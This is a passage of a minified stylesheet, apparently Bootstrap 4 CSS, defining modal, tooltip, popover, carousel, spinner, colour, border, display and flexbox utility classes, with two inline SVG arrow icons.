.modal-backdrop.show { opacity: 0.5; } .modal-header { display: -ms-flexbox; display: flex; -ms-flex-align: start; align-items: flex-start; -ms-flex-pack: justify; justify-content: space-between; padding: 1rem 1rem; border-bottom: 1px solid #dee2e6; border-top-left-radius: calc(0.3rem - 1px); border-top-right-radius: calc(0.3rem - 1px); } .modal-header .close { padding: 1rem 1rem; margin: -1rem -1rem -1rem auto; } .modal-title { margin-bottom: 0; line-height: 1.5; } .modal-body { position: relative; -ms-flex: 1 1 auto; flex: 1 1 auto; padding: 1rem; } .modal-footer { display: -ms-flexbox; display: flex; -ms-flex-wrap: wrap; flex-wrap: wrap; -ms-flex-align: center; align-items: center; -ms-flex-pack: end; justify-content: flex-end; padding: 0.75rem; border-top: 1px solid #dee2e6; border-bottom-right-radius: calc(0.3rem - 1px); border-bottom-left-radius: calc(0.3rem - 1px); } .modal-footer > * { margin: 0.25rem; } .modal-scrollbar-measure { position: absolute; top: -9999px; width: 50px; height: 50px; overflow: scroll; } @media (min-width: 576px) { .modal-dialog { max-width: 500px; margin: 1.75rem auto; } .modal-dialog-scrollable { max-height: calc(100% - 3.5rem); } .modal-dialog-scrollable .modal-content { max-height: calc(100vh - 3.5rem); } .modal-dialog-centered { min-height: calc(100% - 3.5rem); } .modal-dialog-centered::before { height: calc(100vh - 3.5rem); } .modal-sm { max-width: 300px; } } @media (min-width: 992px) { .modal-lg, .modal-xl { max-width: 800px; } } @media (min-width: 1200px) { .modal-xl { max-width: 1140px; } } .tooltip { position: absolute; z-index: 1070; display: block; margin: 0; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, "Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji"; font-style: normal; font-weight: 400; line-height: 1.5; text-align: left; text-align: start; text-decoration: none; text-shadow: none; text-transform: none; letter-spacing: normal; word-break: normal; word-spacing: normal; white-space: normal; line-break: auto; font-size: 0.875rem; word-wrap: break-word; opacity: 0; } .tooltip.show { opacity: 0.9; } .tooltip .arrow { position: absolute; display: block; width: 0.8rem; height: 0.4rem; } .tooltip .arrow::before { position: absolute; content: ""; border-color: transparent; border-style: solid; } .bs-tooltip-top, .bs-tooltip-auto[x-placement^="top"] { padding: 0.4rem 0; } .bs-tooltip-top .arrow, .bs-tooltip-auto[x-placement^="top"] .arrow { bottom: 0; } .bs-tooltip-top .arrow::before, .bs-tooltip-auto[x-placement^="top"] .arrow::before { top: 0; border-width: 0.4rem 0.4rem 0; border-top-color: #000; } .bs-tooltip-right, .bs-tooltip-auto[x-placement^="right"] { padding: 0 0.4rem; } .bs-tooltip-right .arrow, .bs-tooltip-auto[x-placement^="right"] .arrow { left: 0; width: 0.4rem; height: 0.8rem; } .bs-tooltip-right .arrow::before, .bs-tooltip-auto[x-placement^="right"] .arrow::before { right: 0; border-width: 0.4rem 0.4rem 0.4rem 0; border-right-color: #000; } .bs-tooltip-bottom, .bs-tooltip-auto[x-placement^="bottom"] { padding: 0.4rem 0; } .bs-tooltip-bottom .arrow, .bs-tooltip-auto[x-placement^="bottom"] .arrow { top: 0; } .bs-tooltip-bottom .arrow::before, .bs-tooltip-auto[x-placement^="bottom"] .arrow::before { bottom: 0; border-width: 0 0.4rem 0.4rem; border-bottom-color: #000; } .bs-tooltip-left, .bs-tooltip-auto[x-placement^="left"] { padding: 0 0.4rem; } .bs-tooltip-left .arrow, .bs-tooltip-auto[x-placement^="left"] .arrow { right: 0; width: 0.4rem; height: 0.8rem; } .bs-tooltip-left .arrow::before, .bs-tooltip-auto[x-placement^="left"] .arrow::before { left: 0; border-width: 0.4rem 0 0.4rem 0.4rem; border-left-color: #000; } .tooltip-inner { max-width: 200px; padding: 0.25rem 0.5rem; color: #fff; text-align: center; background-color: #000; border-radius: 0.25rem; } .popover { position: absolute; top: 0; left: 0; z-index: 1060; display: block; max-width: 276px; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, "Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji"; font-style: normal; font-weight: 400; line-height: 1.5; text-align: left; text-align: start; text-decoration: none; text-shadow: none; text-transform: none; letter-spacing: normal; word-break: normal; word-spacing: normal; white-space: normal; line-break: auto; font-size: 0.875rem; word-wrap: break-word; background-color: #fff; background-clip: padding-box; border: 1px solid rgba(0, 0, 0, 0.2); border-radius: 0.3rem; } .popover .arrow { position: absolute; display: block; width: 1rem; height: 0.5rem; margin: 0 0.3rem; } .popover .arrow::before, .popover .arrow::after { position: absolute; display: block; content: ""; border-color: transparent; border-style: solid; } .bs-popover-top, .bs-popover-auto[x-placement^="top"] { margin-bottom: 0.5rem; } .bs-popover-top > .arrow, .bs-popover-auto[x-placement^="top"] > .arrow { bottom: calc(-0.5rem - 1px); } .bs-popover-top > .arrow::before, .bs-popover-auto[x-placement^="top"] > .arrow::before { bottom: 0; border-width: 0.5rem 0.5rem 0; border-top-color: rgba(0, 0, 0, 0.25); } .bs-popover-top > .arrow::after, .bs-popover-auto[x-placement^="top"] > .arrow::after { bottom: 1px; border-width: 0.5rem 0.5rem 0; border-top-color: #fff; } .bs-popover-right, .bs-popover-auto[x-placement^="right"] { margin-left: 0.5rem; } .bs-popover-right > .arrow, .bs-popover-auto[x-placement^="right"] > .arrow { left: calc(-0.5rem - 1px); width: 0.5rem; height: 1rem; margin: 0.3rem 0; } .bs-popover-right > .arrow::before, .bs-popover-auto[x-placement^="right"] > .arrow::before { left: 0; border-width: 0.5rem 0.5rem 0.5rem 0; border-right-color: rgba(0, 0, 0, 0.25); } .bs-popover-right > .arrow::after, .bs-popover-auto[x-placement^="right"] > .arrow::after { left: 1px; border-width: 0.5rem 0.5rem 0.5rem 0; border-right-color: #fff; } .bs-popover-bottom, .bs-popover-auto[x-placement^="bottom"] { margin-top: 0.5rem; } .bs-popover-bottom > .arrow, .bs-popover-auto[x-placement^="bottom"] > .arrow { top: calc(-0.5rem - 1px); } .bs-popover-bottom > .arrow::before, .bs-popover-auto[x-placement^="bottom"] > .arrow::before { top: 0; border-width: 0 0.5rem 0.5rem 0.5rem; border-bottom-color: rgba(0, 0, 0, 0.25); } .bs-popover-bottom > .arrow::after, .bs-popover-auto[x-placement^="bottom"] > .arrow::after { top: 1px; border-width: 0 0.5rem 0.5rem 0.5rem; border-bottom-color: #fff; } .bs-popover-bottom .popover-header::before, .bs-popover-auto[x-placement^="bottom"] .popover-header::before { position: absolute; top: 0; left: 50%; display: block; width: 1rem; margin-left: -0.5rem; content: ""; border-bottom: 1px solid #f7f7f7; } .bs-popover-left, .bs-popover-auto[x-placement^="left"] { margin-right: 0.5rem; } .bs-popover-left > .arrow, .bs-popover-auto[x-placement^="left"] > .arrow { right: calc(-0.5rem - 1px); width: 0.5rem; height: 1rem; margin: 0.3rem 0; } .bs-popover-left > .arrow::before, .bs-popover-auto[x-placement^="left"] > .arrow::before { right: 0; border-width: 0.5rem 0 0.5rem 0.5rem; border-left-color: rgba(0, 0, 0, 0.25); } .bs-popover-left > .arrow::after, .bs-popover-auto[x-placement^="left"] > .arrow::after { right: 1px; border-width: 0.5rem 0 0.5rem 0.5rem; border-left-color: #fff; } .popover-header { padding: 0.5rem 0.75rem; margin-bottom: 0; font-size: 1rem; background-color: #f7f7f7; border-bottom: 1px solid #ebebeb; border-top-left-radius: calc(0.3rem - 1px); border-top-right-radius: calc(0.3rem - 1px); } .popover-header:empty { display: none; } .popover-body { padding: 0.5rem 0.75rem; color: #212529; } .carousel { position: relative; } .carousel.pointer-event { -ms-touch-action: pan-y; touch-action: pan-y; } .carousel-inner { position: relative; width: 100%; overflow: hidden; } .carousel-inner::after { display: block; clear: both; content: ""; } .carousel-item { position: relative; display: none; float: left; width: 100%; margin-right: -100%; -webkit-backface-visibility: hidden; backface-visibility: hidden; transition: -webkit-transform 0.6s ease-in-out; transition: transform 0.6s ease-in-out; transition: transform 0.6s ease-in-out, -webkit-transform 0.6s ease-in-out; } @media (prefers-reduced-motion: reduce) { .carousel-item { transition: none; } } .carousel-item.active, .carousel-item-next, .carousel-item-prev { display: block; } .carousel-item-next:not(.carousel-item-left), .active.carousel-item-right { -webkit-transform: translateX(100%); transform: translateX(100%); } .carousel-item-prev:not(.carousel-item-right), .active.carousel-item-left { -webkit-transform: translateX(-100%); transform: translateX(-100%); } .carousel-fade .carousel-item { opacity: 0; transition-property: opacity; -webkit-transform: none; transform: none; } .carousel-fade .carousel-item.active, .carousel-fade .carousel-item-next.carousel-item-left, .carousel-fade .carousel-item-prev.carousel-item-right { z-index: 1; opacity: 1; } .carousel-fade .active.carousel-item-left, .carousel-fade .active.carousel-item-right { z-index: 0; opacity: 0; transition: opacity 0s 0.6s; } @media (prefers-reduced-motion: reduce) { .carousel-fade .active.carousel-item-left, .carousel-fade .active.carousel-item-right { transition: none; } } .carousel-control-prev, .carousel-control-next { position: absolute; top: 0; bottom: 0; z-index: 1; display: -ms-flexbox; display: flex; -ms-flex-align: center; align-items: center; -ms-flex-pack: center; justify-content: center; width: 15%; color: #fff; text-align: center; opacity: 0.5; transition: opacity 0.15s ease; } @media (prefers-reduced-motion: reduce) { .carousel-control-prev, .carousel-control-next { transition: none; } } .carousel-control-prev:hover, .carousel-control-prev:focus, .carousel-control-next:hover, .carousel-control-next:focus { color: #fff; text-decoration: none; outline: 0; opacity: 0.9; } .carousel-control-prev { left: 0; } .carousel-control-next { right: 0; } .carousel-control-prev-icon, .carousel-control-next-icon { display: inline-block; width: 20px; height: 20px; background: no-repeat 50% / 100% 100%; } .carousel-control-prev-icon { background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' fill='%23fff' width='8' height='8' viewBox='0 0 8 8'%3e%3cpath d='M5.25 0l-4 4 4 4 1.5-1.5L4.25 4l2.5-2.5L5.25 0z'/%3e%3c/svg%3e"); } .carousel-control-next-icon { background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' fill='%23fff' width='8' height='8' viewBox='0 0 8 8'%3e%3cpath d='M2.75 0l-1.5 1.5L3.75 4l-2.5 2.5L2.75 8l4-4-4-4z'/%3e%3c/svg%3e"); } .carousel-indicators { position: absolute; right: 0; bottom: 0; left: 0; z-index: 15; display: -ms-flexbox; display: flex; -ms-flex-pack: center; justify-content: center; padding-left: 0; margin-right: 15%; margin-left: 15%; list-style: none; } .carousel-indicators li { box-sizing: content-box; -ms-flex: 0 1 auto; flex: 0 1 auto; width: 30px; height: 3px; margin-right: 3px; margin-left: 3px; text-indent: -999px; cursor: pointer; background-color: #fff; background-clip: padding-box; border-top: 10px solid transparent; border-bottom: 10px solid transparent; opacity: .5; transition: opacity 0.6s ease; } @media (prefers-reduced-motion: reduce) { .carousel-indicators li { transition: none; } } .carousel-indicators .active { opacity: 1; } .carousel-caption { position: absolute; right: 15%; bottom: 20px; left: 15%; z-index: 10; padding-top: 20px; padding-bottom: 20px; color: #fff; text-align: center; } @-webkit-keyframes spinner-border { to { -webkit-transform: rotate(360deg); transform: rotate(360deg); } } @keyframes spinner-border { to { -webkit-transform: rotate(360deg); transform: rotate(360deg); } } .spinner-border { display: inline-block; width: 2rem; height: 2rem; vertical-align: text-bottom; border: 0.25em solid currentColor; border-right-color: transparent; border-radius: 50%; -webkit-animation: spinner-border .75s linear infinite; animation: spinner-border .75s linear infinite; } .spinner-border-sm { width: 1rem; height: 1rem; border-width: 0.2em; } @-webkit-keyframes spinner-grow { 0% { -webkit-transform: scale(0); transform: scale(0); } 50% { opacity: 1; } } @keyframes spinner-grow { 0% { -webkit-transform: scale(0); transform: scale(0); } 50% { opacity: 1; } } .spinner-grow { display: inline-block; width: 2rem; height: 2rem; vertical-align: text-bottom; background-color: currentColor; border-radius: 50%; opacity: 0; -webkit-animation: spinner-grow .75s linear infinite; animation: spinner-grow .75s linear infinite; } .spinner-grow-sm { width: 1rem; height: 1rem; } .align-baseline { vertical-align: baseline !important; } .align-top { vertical-align: top !important; } .align-middle { vertical-align: middle !important; } .align-bottom { vertical-align: bottom !important; } .align-text-bottom { vertical-align: text-bottom !important; } .align-text-top { vertical-align: text-top !important; } .bg-primary { background-color: #007bff !important; } a.bg-primary:hover, a.bg-primary:focus, button.bg-primary:hover, button.bg-primary:focus { background-color: #0062cc !important; } .bg-secondary { background-color: #6c757d !important; } a.bg-secondary:hover, a.bg-secondary:focus, button.bg-secondary:hover, button.bg-secondary:focus { background-color: #545b62 !important; } .bg-success { background-color: #28a745 !important; } a.bg-success:hover, a.bg-success:focus, button.bg-success:hover, button.bg-success:focus { background-color: #1e7e34 !important; } .bg-info { background-color: #17a2b8 !important; } a.bg-info:hover, a.bg-info:focus, button.bg-info:hover, button.bg-info:focus { background-color: #117a8b !important; } .bg-warning { background-color: #ffc107 !important; } a.bg-warning:hover, a.bg-warning:focus, button.bg-warning:hover, button.bg-warning:focus { background-color: #d39e00 !important; } .bg-danger { background-color: #dc3545 !important; } a.bg-danger:hover, a.bg-danger:focus, button.bg-danger:hover, button.bg-danger:focus { background-color: #bd2130 !important; } .bg-light { background-color: #f8f9fa !important; } a.bg-light:hover, a.bg-light:focus, button.bg-light:hover, button.bg-light:focus { background-color: #dae0e5 !important; } .bg-dark { background-color: #343a40 !important; } a.bg-dark:hover, a.bg-dark:focus, button.bg-dark:hover, button.bg-dark:focus { background-color: #1d2124 !important; } .bg-white { background-color: #fff !important; } .bg-transparent { background-color: transparent !important; } .border { border: 1px solid #dee2e6 !important; } .border-top { border-top: 1px solid #dee2e6 !important; } .border-right { border-right: 1px solid #dee2e6 !important; } .border-bottom { border-bottom: 1px solid #dee2e6 !important; } .border-left { border-left: 1px solid #dee2e6 !important; } .border-0 { border: 0 !important; } .border-top-0 { border-top: 0 !important; } .border-right-0 { border-right: 0 !important; } .border-bottom-0 { border-bottom: 0 !important; } .border-left-0 { border-left: 0 !important; } .border-primary { border-color: #007bff !important; } .border-secondary { border-color: #6c757d !important; } .border-success { border-color: #28a745 !important; } .border-info { border-color: #17a2b8 !important; } .border-warning { border-color: #ffc107 !important; } .border-danger { border-color: #dc3545 !important; } .border-light { border-color: #f8f9fa !important; } .border-dark { border-color: #343a40 !important; } .border-white { border-color: #fff !important; } .rounded-sm { border-radius: 0.2rem !important; } .rounded { border-radius: 0.25rem !important; } .rounded-top { border-top-left-radius: 0.25rem !important; border-top-right-radius: 0.25rem !important; } .rounded-right { border-top-right-radius: 0.25rem !important; border-bottom-right-radius: 0.25rem !important; } .rounded-bottom { border-bottom-right-radius: 0.25rem !important; border-bottom-left-radius: 0.25rem !important; } .rounded-left { border-top-left-radius: 0.25rem !important; border-bottom-left-radius: 0.25rem !important; } .rounded-lg { border-radius: 0.3rem !important; } .rounded-circle { border-radius: 50% !important; } .rounded-pill { border-radius: 50rem !important; } .rounded-0 { border-radius: 0 !important; } .clearfix::after { display: block; clear: both; content: ""; } .d-none { display: none !important; } .d-inline { display: inline !important; } .d-inline-block { display: inline-block !important; } .d-block { display: block !important; } .d-table { display: table !important; } .d-table-row { display: table-row !important; } .d-table-cell { display: table-cell !important; } .d-flex { display: -ms-flexbox !important; display: flex !important; } .d-inline-flex { display: -ms-inline-flexbox !important; display: inline-flex !important; } @media (min-width: 576px) { .d-sm-none { display: none !important; } .d-sm-inline { display: inline !important; } .d-sm-inline-block { display: inline-block !important; } .d-sm-block { display: block !important; } .d-sm-table { display: table !important; } .d-sm-table-row { display: table-row !important; } .d-sm-table-cell { display: table-cell !important; } .d-sm-flex { display: -ms-flexbox !important; display: flex !important; } .d-sm-inline-flex { display: -ms-inline-flexbox !important; display: inline-flex !important; } } @media (min-width: 768px) { .d-md-none { display: none !important; } .d-md-inline { display: inline !important; } .d-md-inline-block { display: inline-block !important; } .d-md-block { display: block !important; } .d-md-table { display: table !important; } .d-md-table-row { display: table-row !important; } .d-md-table-cell { display: table-cell !important; } .d-md-flex { display: -ms-flexbox !important; display: flex !important; } .d-md-inline-flex { display: -ms-inline-flexbox !important; display: inline-flex !important; } } @media (min-width: 992px) { .d-lg-none { display: none !important; } .d-lg-inline { display: inline !important; } .d-lg-inline-block { display: inline-block !important; } .d-lg-block { display: block !important; } .d-lg-table { display: table !important; } .d-lg-table-row { display: table-row !important; } .d-lg-table-cell { display: table-cell !important; } .d-lg-flex { display: -ms-flexbox !important; display: flex !important; } .d-lg-inline-flex { display: -ms-inline-flexbox !important; display: inline-flex !important; } } @media (min-width: 1200px) { .d-xl-none { display: none !important; } .d-xl-inline { display: inline !important; } .d-xl-inline-block { display: inline-block !important; } .d-xl-block { display: block !important; } .d-xl-table { display: table !important; } .d-xl-table-row { display: table-row !important; } .d-xl-table-cell { display: table-cell !important; } .d-xl-flex { display: -ms-flexbox !important; display: flex !important; } .d-xl-inline-flex { display: -ms-inline-flexbox !important; display: inline-flex !important; } } @media print { .d-print-none { display: none !important; } .d-print-inline { display: inline !important; } .d-print-inline-block { display: inline-block !important; } .d-print-block { display: block !important; } .d-print-table { display: table !important; } .d-print-table-row { display: table-row !important; } .d-print-table-cell { display: table-cell !important; } .d-print-flex { display: -ms-flexbox !important; display: flex !important; } .d-print-inline-flex { display: -ms-inline-flexbox !important; display: inline-flex !important; } } .embed-responsive { position: relative; display: block; width: 100%; padding: 0; overflow: hidden; } .embed-responsive::before { display: block; content: ""; } .embed-responsive .embed-responsive-item, .embed-responsive iframe, .embed-responsive embed, .embed-responsive object, .embed-responsive video { position: absolute; top: 0; bottom: 0; left: 0; width: 100%; height: 100%; border: 0; } .embed-responsive-21by9::before { padding-top: 42.857143%; } .embed-responsive-16by9::before { padding-top: 56.25%; } .embed-responsive-4by3::before { padding-top: 75%; } .embed-responsive-1by1::before { padding-top: 100%; } .flex-row { -ms-flex-direction: row !important; flex-direction: row !important; } .flex-column { -ms-flex-direction: column !important; flex-direction: column !important; } .flex-row-reverse { -ms-flex-direction: row-reverse !important; flex-direction: row-reverse !important; } .flex-column-reverse { -ms-flex-direction: column-reverse !important; flex-direction: column-reverse !important; } .flex-wrap { -ms-flex-wrap: wrap !important; flex-wrap: wrap !important; } .flex-nowrap { -ms-flex-wrap: nowrap !important; flex-wrap: nowrap !important; } .flex-wrap-reverse { -ms-flex-wrap: wrap-reverse !important; flex-wrap: wrap-reverse !important; } .flex-fill { -ms-flex: 1 1 auto !important; flex: 1 1 auto !important; } .flex-grow-0 { -ms-flex-positive: 0 !important; flex-grow: 0 !important; } .flex-grow-1 { -ms-flex-positive: 1 !important; flex-grow: 1 !important; } .flex-shrink-0 { -ms-flex-negative: 0 !important; flex-shrink: 0 !important; } .flex-shrink-1 { -ms-flex-negative: 1 !important; flex-shrink: 1 !important; } .justify-content-start { -ms-flex-pack: start !important; justify-content: flex-start !important; } .justify-content-end { -ms-flex-pack: end !important; justify-content: flex-end !important; } .justify-content-center { -ms-flex-pack: center !important; justify-content: center !important; } .justify-content-between { -ms-flex-pack: justify !important; justify-content: space-between !important; } .justify-content-around { -ms-flex-pack: distribute !important; justify-content: space-around !important; } .align-items-start { -ms-flex-align: start !important; align-items: flex-start !important; } .align-items-end { -ms-flex-align: end !important; align-items: flex-end !important; } .align-items-center { -ms-flex-align: center !important; align-items: center !important; } .align-items-baseline { -ms-flex-align: baseline !important; align-items: baseline !important; } .align-items-stretch { -ms-flex-align: stretch !important; align-items: stretch !important; } .align-content-start { -ms-flex-line-pack: start !important; align-content: flex-start !important; } .align-content-end { -ms-flex-line-pack: end !important; align-content: flex-end !important; } .align-content-center { -ms-flex-line-pack: center !important; align-content: center !important; } .align-content-between { -ms-flex-line-pack: justify !important; align-content: space-between !important; } .align-content-around { -ms-flex-line-pack: distribute !important; align-content: space-around !important; } .align-content-stretch { -ms-flex-line-pack: stretch !important; align-content: stretch !important; } .align-self-auto { -ms-flex-item-align: auto !important; align-self: auto !important; } .align-self-start { -ms-flex-item-align: start !important; align-self: flex-start !important; } .align-self-end { -ms-flex-item-align: end !important; align-self: flex-end !important; } .align-self-center { -ms-flex-item-align: center !important; align-self: center !important; } .align-self-baseline { -ms-flex-item-align: baseline !important; align-self: baseline !important; } .align-self-stretch { -ms-flex-item-align: stretch !important; align-self: stretch !important; } @media (min-width: 576px) { .flex-sm-row { -ms-flex-direction: row !important; flex-direction: row !important; } .flex-sm-column { -ms-flex-direction: column !important; flex-direction: column !important; } .flex-sm-row-reverse { -ms-flex-direction: row-reverse !important; flex-direction: row-reverse !important; } .flex-sm-column-reverse { -ms-flex-direction: column-reverse !important; flex-direction: column-reverse !important; } .flex-sm-wrap { -ms-flex-wrap: wrap !important; flex-wrap: wrap !important; } .flex-sm-nowrap { -ms-flex-wrap: nowrap !important; flex-wrap: nowrap !important; } .flex-sm-wrap-reverse { -ms-flex-wrap: wrap-reverse !important; flex-wrap: wrap-reverse !important; } .flex-sm-fill { -ms-flex: 1 1 auto !important; flex: 1 1 auto !important; } .flex-sm-grow-0 { -ms-flex-positive: 0 !important; flex-grow: 0 !important; } .flex-sm-grow-1 { -ms-flex-positive: 1 !important; flex-grow: 1 !important; } .flex-sm-shrink-0 { -ms-flex-negative: 0 !important; flex-shrink: 0 !important; } .flex-sm-shrink-1 { -ms-flex-negative: 1 !important; flex-shrink: 1 !important; } .justify-content-sm-start { -ms-flex-pack: start !important; justify-content: flex-start !important; } .justify-content-sm-end { -ms-flex-pack: end !important; justify-content: flex-end !important; } .justify-content-sm-center { -ms-flex-pack: center !important; justify-content: center !important; } .justify-content-sm-between { -ms-flex-pack: justify !important; justify-content: space-between !important; } .justify-content-sm-around { -ms-flex-pack: distribute !important; justify-content: space-around !important; } .align-items-sm-start { -ms-flex-align: start !important; align-items: flex-start !important; } .align-items-sm-end { -ms-flex-align: end !important; align-items: flex-end !important; } .align-items-sm-center { -ms-flex-align: center !important; align-items: center !important; } .align-items-sm-baseline { -ms-flex-align: baseline !important; align-items: baseline !important; } .align-items-sm-stretch { -ms-flex-align: stretch !important; align-items: stretch !important; } .align-content-sm-start { -ms-flex-line-pack: start !important; align-content: flex-start !important; } .align-content-sm-end { -ms-flex-line-pack: end !important; align-content: flex-end !important; } .align-content-sm-center { -ms-flex-line-pack: center !important; align-content: center !important; } .align-content-sm-between { -ms-flex-line-pack: justify !important; align-content: space-between !important; } .align-content-sm-around { -ms-flex-line-pack: distribute !important; align-content: space-around !important; } .align-content-sm-stretch { -ms-flex-line-pack: stretch !important; align-content: stretch !important; } .align-self-sm-auto { -ms-flex-item-align: auto !important; align-self: auto !important; } .align-self-sm-start { -ms-flex-item-align: start !important; align-self: flex-start !important; } .align-self-sm-end { -ms-flex-item-align: end !important; align-self: flex-end !important; } .align-self-sm-center { -ms-flex-item-align: center !important; align-self: center !important; } .align-self-sm-baseline { -ms-flex-item-align: baseline !important; align-self: baseline !important; } .align-self-sm-stretch { -ms-flex-item-align: stretch !important; align-self: stretch !important; } } @media (min-width: 768px) { .flex-md-row { -ms-flex-direction: row !important; flex-direction: row !important; } .flex-md-column { -ms-flex-direction: column !important; flex-direction: column !important; } .flex-md-row-reverse { -ms-flex-direction: row-reverse !important; flex-direction: row-reverse !important; } .flex-md-column-reverse { -ms-flex-direction: column-reverse !important; flex-direction: column-reverse !important; } .flex-md-wrap { -ms-flex-wrap: wrap !important; flex-wrap: wrap !important; } .flex-md-nowrap { -ms-flex-wrap: nowrap !important; flex-wrap: nowrap !important; } .flex-md-wrap-reverse { -ms-flex-wrap: wrap-reverse !important; flex-wrap: wrap-reverse !important; } .flex-md-fill { -ms-flex: 1 1 auto !important; flex: 1 1 auto !important; } .flex-md-grow-0 { -ms-flex-positive: 0 !important; flex-grow: 0 !important; } .flex-md-grow-1 { -ms-flex-positive: 1 !important; flex-grow: 1 !important; } .flex-md-shrink-0 { -ms-flex-negative: 0 !important; flex-shrink: 0 !important; } .flex-md-shrink-1 { -ms-flex-negative: 1 !important; flex-shrink: 1 !important; } .justify-content-md-start { -ms-flex-pack: start !important; justify-content: flex-start !important; } .justify-content-md-end { -ms-flex-pack: end !important; justify-content: flex-end !important; } .justify-content-md-center { -ms-flex-pack: center !important; justify-content: center !important; } .justify-content-md-between { -ms-flex-pack: justify !important; justify-content: space-between !important; } .justify-content-md-around { -ms-flex-pack: distribute !important; justify-content: space-around !important; } .align-items-md-start { -ms-flex-align: start !important; align-items: flex-start !important; } .align-items-md-end { -ms-flex-align: end !important; align-items: flex-end !important; } .align-items-md-center { -ms-flex-align: center !important; align-items: center !important; } .align-items-md-baseline { -ms-flex-align: baseline !important; align-items: baseline !important; } .align-items-md-stretch { -ms-flex-align: stretch !important; align-items: stretch !important; } .align-content-md-start { -ms-flex-line-pack: start !important; align-content: flex-start !important; } .align-content-md-end { -ms-flex-line-pack: end !important; align-content: flex-end !important; } .align-content-md-center { -ms-flex-line-pack: center !important; align-content: center !important; } .align-content-md-between { -ms-flex-line-pack: justify !important; align-content: space-between !important; } .align-content-md-around { -ms-flex-line-pack: distribute !important; align-content: space-around !important; } .align-content-md-stretch { -ms-flex-line-pack: stretch !important; align-content: stretch !important; } .align-self-md-auto { -ms-flex-item-align: auto !important; align-self: auto !important; } .align-self-md-start { -ms-flex-item-align: start !important; align-self: flex-start !important; } .align-self-md-end { -ms-flex-item-align: end !important; align-self: flex-end !important; } .align-self-md-center { -ms-flex-item-align: center !important; align-self: center !important; } .align-self-md-baseline { -ms-flex-item-align: baseline !important; align-self: baseline !important; } .align-self-md-stretch { -ms-flex-item-align: stretch !important; align-self: stretch !important; } } @media (min-width: 992px) { .flex-lg-row { -ms-flex-direction: row !important; flex-direction: row !important; } .flex-lg-column { -ms-flex-direction: column !important; flex-direction: column !important; } .flex-lg-row-reverse { -ms-flex-direction: row-reverse !important; flex-direction: row-reverse !important; } .flex-lg-column-reverse { -ms-flex-direction: column-reverse !important; flex-direction: column-reverse !important; } .flex-lg-wrap { -ms-flex-wrap: wrap !important; flex-wrap: wrap !important; } .flex-lg-nowrap { -ms-flex-wrap: nowrap !important; flex-wrap: nowrap !important; } .flex-lg-wrap-reverse { -ms-flex-wrap: wrap-reverse !important; flex-wrap: wrap-reverse !important; } .flex-lg-fill { -ms-flex: 1 1 auto !important; flex: 1 1 auto !important; } .flex-lg-grow-0 { -ms-flex-positive: 0 !important; flex-grow: 0 !important; } .flex-lg-grow-1 { -ms-flex-positive: 1 !important; flex-grow: 1 !important; } .flex-lg-shrink-0 { -ms-flex-negative: 0 !important; flex-shrink: 0 !important; } .flex-lg-shrink-1 { -ms-flex-negative: 1 !important; flex-shrink: 1 !important; } .justify-content-lg-start { -ms-flex-pack: start !important; justify-content: flex-start !important; } .justify-content-lg-end { -ms-flex-pack: end !important; justify-content: flex-end !important; } .justify-content-lg-center { -ms-flex-pack: center !important; justify-content: center !important; } .justify-content-lg-between { -ms-flex-pack: justify !important; justify-content: space-between !important; } .justify-content-lg-around { -ms-flex-pack: distribute !important; justify-content: space-around !important; } .align-items-lg-start { -ms-flex-align: start !important; align-items: flex-start !important; } .align-items-lg-end { -ms-flex-align: end !important; align-items: flex-end !important; } .align-items-lg-center { -ms-flex-align: center !important; align-items: center !important; } .align-items-lg-baseline { -ms-flex-align: baseline !important; align-items: baseline !important; } .align-items-lg-stretch { -ms-flex-align: stretch !important; align-items: stretch !important; } .align-content-lg-start { -ms-flex-line-pack: start !important; align-content: flex-start !important; } .align-content-lg-end { -ms-flex-line-pack: end !important; align-content: flex-end !important; } .align-content-lg-center { -ms-flex-line-pack: center !important; align-content: center !important; } .align-content-lg-between { -ms-flex-line-pack: justify !important; align-content: space-between !important; } .align-content-lg-around { -ms-flex-line-pack: distribute !important; align-content: space-around !important; } .align-content-lg-stretch { -ms-flex-line-pack: stretch !important; align-content: stretch !important; } .align-self-lg-auto { -ms-flex-item-align: auto !important; align-self: auto !important; } .align-self-lg-start { -ms-flex-item-align: start !important; align-self: flex-start !important; } .align-self-lg-end { -ms-flex-item-align: end !important; align-self: flex-end !important; } .align-self-lg-center { -ms-flex-item-align: center !important; align-self: center !important; } .align-self-lg-baseline { -ms-flex-item-align: baseline !important; align-self: baseline !important; } .align-self-lg-stretch { -ms-flex-item-align: stretch !important; align-self: stretch !important; } } @media (min-width: 1200px) { .flex-xl-row { -ms-flex-direction: row !important; flex-direction: row !important; } .flex-xl-column { -ms-flex-direction: column !important; flex-direction: column !important; } .flex-xl-row-reverse { -ms-flex-direction: row-reverse !important; flex-direction: row-reverse !important; } .flex-xl-column-reverse { -ms-flex-direction: column-reverse !important; flex-direction: column-reverse !important; } .flex-xl-wrap { -ms-flex-wrap: wrap !important; flex-wrap: wrap !important; } .flex-xl-nowrap { -ms-flex-wrap: nowrap !important; flex-wrap: nowrap !important; } .flex-xl-wrap-reverse { -ms-flex-wrap: wrap-reverse !important; flex-wrap: wrap-reverse !important; } .flex-xl-fill { -ms-flex: 1 1 auto !important; flex: 1 1 auto !important; } .flex-xl-grow-0 { -ms-flex-positive: 0 !important; flex-grow: 0 !important; } .flex-xl-grow-1 { -ms-flex-positive: 1 !important; flex-grow: 1 !important; } .flex-xl-shrink-0 { -ms-flex-negative: 0 !important; flex-shrink: 0 !important; } .flex-xl-shrink-1 { -ms-flex-negative: 1 !important; flex-shrink: 1 !important; } .justify-content-xl-start { -ms-flex-pack: start !important; justify-content: flex-start !important; } .justify-content-xl-end { -ms-flex-pack: end !important; justify-content: flex-end !important; } .justify-content-xl-center { -ms-flex-pack: center !important; justify-content: center !important; } .justify-content-xl-between { -ms-flex-pack: justify !important; justify-content: space-between !important; } .justify-content-xl-around { -ms-flex-pack: distribute !important; justify-content: space-around !important; } .align-items-xl-start { -ms-flex-align: start !important; align-items: flex-start !important; } .align-items-xl-end { -ms-flex-align: end !important; align-items: flex-end !important; } .align-items-xl-center { 